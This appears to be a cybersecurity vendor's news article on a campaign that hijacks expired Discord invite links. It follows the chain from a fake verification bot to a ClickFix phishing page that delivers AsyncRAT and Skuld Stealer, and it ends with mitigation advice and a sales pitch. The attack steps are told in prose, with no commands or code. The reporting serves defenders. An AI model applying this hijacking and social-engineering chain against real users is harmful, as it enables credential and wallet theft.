Cybercriminals are exploiting a subtle vulnerability in Discord's invite system, hijacking expired and deleted invite links to redirect users to malicious servers. This sophisticated multi-stage attack delivers AsyncRAT and Skuld Stealer, primarily targeting cryptocurrency wallets and sensitive user data, highlighting a significant threat to Discord users.

Discord Invite Link Hijacking: A New Attack Vector

Recent investigations by Check Point Research have revealed a cunning new method employed by cybercriminals: the exploitation of Discord's invite link mechanism. Attackers are reclaiming expired or deleted Discord invite links, including custom "vanity" URLs and standard codes, to reroute unsuspecting users to their own malicious servers. This technique forms the initial stage of a complex multi-stage attack.

• Exploiting Invite Reuse: When a temporary or custom invite link expires or is deleted, attackers can quickly register the same code for their own boosted Discord servers. This allows them to capitalize on the lingering trust associated with previously legitimate links shared across forums, social media, and official channels.

• Types of Vulnerable Links:Temporary Invite Links: Easily re-registered as vanity invites after expiration or deletion.Custom Vanity Invite Links: Become available for re-registration if the original server loses its premium "Level 3 Boost" status.Permanent Invite Links: Only conditionally vulnerable if deleted and composed solely of lowercase letters and digits.

The Deceptive Infection Chain

Once users join a hijacked Discord server, they are typically directed to a "verify" channel. Here, a fake bot, such as "Safeguard#0786," prompts them to complete a "verification" step, which involves authorizing the bot and being redirected to an external phishing site like .

This phishing page mimics Discord's user interface and employs a social engineering technique known as "ClickFix." A fake Google CAPTCHA appears to fail, instructing users to manually paste and execute a pre-loaded PowerShell command. This command initiates the multi-stage malware delivery process:

1. PowerShell Execution: The PowerShell script downloads and executes a first-stage downloader (installer.exe) from GitHub.

2. Multi-Stage Loaders: The installer.exe then retrieves subsequent encrypted payloads from Bitbucket.

3. Persistence and Evasion: The malware establishes persistence through scheduled tasks, running every five minutes, and employs obfuscation and sandbox evasion techniques to delay execution and avoid detection.

Malicious Payloads: AsyncRAT and Skuld Stealer

The campaign primarily delivers two potent malware payloads:

• AsyncRAT: An open-source Remote Access Trojan (RAT) that grants attackers full control over the victim's machine, enabling command execution, keylogging, and file manipulation.

• Skuld Stealer: A customized information-stealing malware specifically designed to target:Browser credentialsDiscord tokensCryptocurrency wallets (Exodus and Atomic)

Skuld Stealer injects malicious JavaScript into legitimate wallet applications, stealing seed phrases and passwords, and exfiltrates this sensitive data via Discord webhooks. The attackers have also adapted tools like ChromeKatz to bypass Chrome's Application-Bound Encryption (ABE), allowing them to steal cookies directly from browser memory.

Mitigation and Ongoing Threat

This campaign underscores how seemingly minor platform features can be weaponized. The use of trusted services like Discord, GitHub, Bitbucket, and Pastebin helps the malicious traffic blend in with normal network activity, making detection challenging. While Discord has taken action against specific malicious bots, the underlying vulnerability in invite link management remains a concern.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Users are advised to:

• Use permanent invite links whenever possible.

• Regularly check and update shared invites.

• Be wary of "verification" prompts and unauthorized bot interactions.

• Deploy robust endpoint protection solutions capable of detecting multi-stage malware and suspicious PowerShell activity.

The campaign has impacted over 1,300 potential victims across various countries, including the United States, Vietnam, France, Germany, and the United Kingdom, with a clear financial motivation targeting cryptocurrency users.

Sources

• Cybercriminals Exploiting Expired Discord Invite Links to Deploy Multi-Stage Malware, GBHackers News.

• Threat Actors Exploiting Expired Discord Invite Links to Deliver Multi-Stage Malware, CybersecurityNews.

• The Discord Invite Loop Hole Hijacked for Attacks, Check Point Software.

• Hijacked Discord Leads to AsyncRAT and Skuld Stealer Infections, TechNadu.

• Hackers Compromise Discord Invite to Inject Malicious Links Delivering AsyncRAT, GBHackers News.